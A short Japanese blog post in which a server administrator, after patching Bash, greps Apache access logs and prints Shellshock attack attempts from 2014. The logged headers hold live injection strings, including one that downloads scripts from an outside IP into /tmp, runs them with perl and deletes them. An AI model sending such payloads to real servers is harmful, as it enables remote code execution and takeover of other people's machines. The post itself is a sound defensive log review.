当方も外部に公開しているLinuxサーバがあり、脆弱性の深刻度を考慮して早々にBashのアップデートを行いました
念の為にApacheのアクセスログを確認したところ攻撃を受けた記録がありました
あの手この手で攻撃手法が考えられているんでしょう
1 2 3 4 5 6 7 8 |
[root@host1 ~]# grep '() {' /var/log/apache/access_log* /var/log/apache/access_log:209.126.230.72 - - [25/Sep/2014:14:57:25 +0900] "GET / HTTP/1.0" 301 253 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/apache/access_log:54.251.83.67 - - [26/Sep/2014:12:24:26 +0900] "GET / HTTP/1.1" 301 231 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" /var/log/apache/access_log:118.192.48.6 - - [27/Sep/2014:21:57:12 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 186 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo QtFMdb3VGx`;" /var/log/apache/access_log:118.192.48.6 - - [27/Sep/2014:21:57:12 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 185 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo ITlG6QWEbX`;" /var/log/apache/access_log:118.192.48.6 - - [27/Sep/2014:21:57:12 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 185 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo Wkj86XUaQV`;" /var/log/apache/access_log:118.192.48.6 - - [27/Sep/2014:21:57:12 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 187 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 9aEJgsCxz1`;" /var/log/apache/access_log:173.45.100.18 - - [29/Sep/2014:08:38:24 +0900] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" |
ログにURLが記録されていたので最新の注意でアクセスしたところ、shellshock scanのコードが公開されていました
このコードをベースにマルウェアも作成されているようで厄介ですね
Bash ‘shellshock’ scan of the Internet
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html